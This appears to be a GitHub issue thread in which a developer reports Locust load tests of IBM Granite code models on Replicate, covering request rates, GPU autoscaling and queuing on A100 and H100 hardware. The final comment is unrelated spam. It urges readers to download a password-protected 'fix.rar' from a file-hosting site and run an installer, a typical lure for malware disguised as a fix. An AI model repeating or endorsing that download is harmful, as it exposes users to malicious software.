Closed adampingel closed 2 months ago
Locust testing framework under development targeting Replicate's http interface.
Will publish a quick test baseline + results shortly. Do not forsee any heavy lifting here.
Tested various scenarios up from 1 req/sec up to 30 req/sec under a "1 A100 80 GB GPU that can scale up to 2" scenario, testing for 1 hour at a time.
Tl;DR:
20 req/sec everything behaves as expected. This is the first rate that requires scaling up from 1 GPU to 2, and the scaling is needed immediately and persists for the entire 1 hour run. 25 req/sec is unstable 30 req/sec is oversaturated and results in extensive queuing of requests.
I'll have to repeat some of these to make sure behavior is consistent.
I'll publish all data and results as soon as I find a place to publish them, and then I'll call a review.
Reviewed current state and results at large with the larger group at a meeting yesterday afternoon.
TODOs: switch to the H100s, dynamic prompts, figure out how to tabulate the duration metrics server side, and finally discuss with the Replicate tech support guys our results to make sure our assumptions are accurate with regards to interpreting the UI graphs.
Furthermore - switch from the http interface to the Replicate SDK in Locust?
Also, find a home for the code base and results.
Running the tests on the H100s now. Not nearly as scalable / resilient as the A100s.
Switched to dynamic prompts using the HF datasets library and the HF Python code completion data set iamtarun/python_code_instructions_18k_alpaca
Added a second sets of tests for testing using the Replicate SDK, and modified those tests to wait for the response. Those tests did not exevcute cleanly, throughput was much lower than expected. (30 users resulted in 3 requests per second). Will revisit.
Also, will create a new ticket at some point to use the Replicate API to dump performance data into Airtable. Most metrics in Replicate time out after an hour.
Final numbers for ibm-granite / granite-8b-code-instruct-128k on the H100s (20x CPU / 80GB GPU RAM / 72GB RAM x 2: 7.6 requests per second sustained. At 8.7 requests per second, the deployment autoscales from 2 to 3 GPUs, and an ever increasing queue begins building, which it never recovers from.
Final numbers for ibm-granite / granite-20b-code-instruct-8k on the H100s (20x CPU / 80GB GPU RAM / 72GB RAM x 1: 6.1 req / sec causes a scale up from 1 GPU to 2. This scale up (and the subsequent scale down) were clean. 7.5 req /sec caused a scale up from 1 GPU 2, and resulted in queuing that did not clear until the test was over.
Recommend closing this ticket, and opening a new one to find a place to park the Locust script and report all the detailed results. Perhaps a deployment repo ion the public ibm-granite GitHub org?
Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."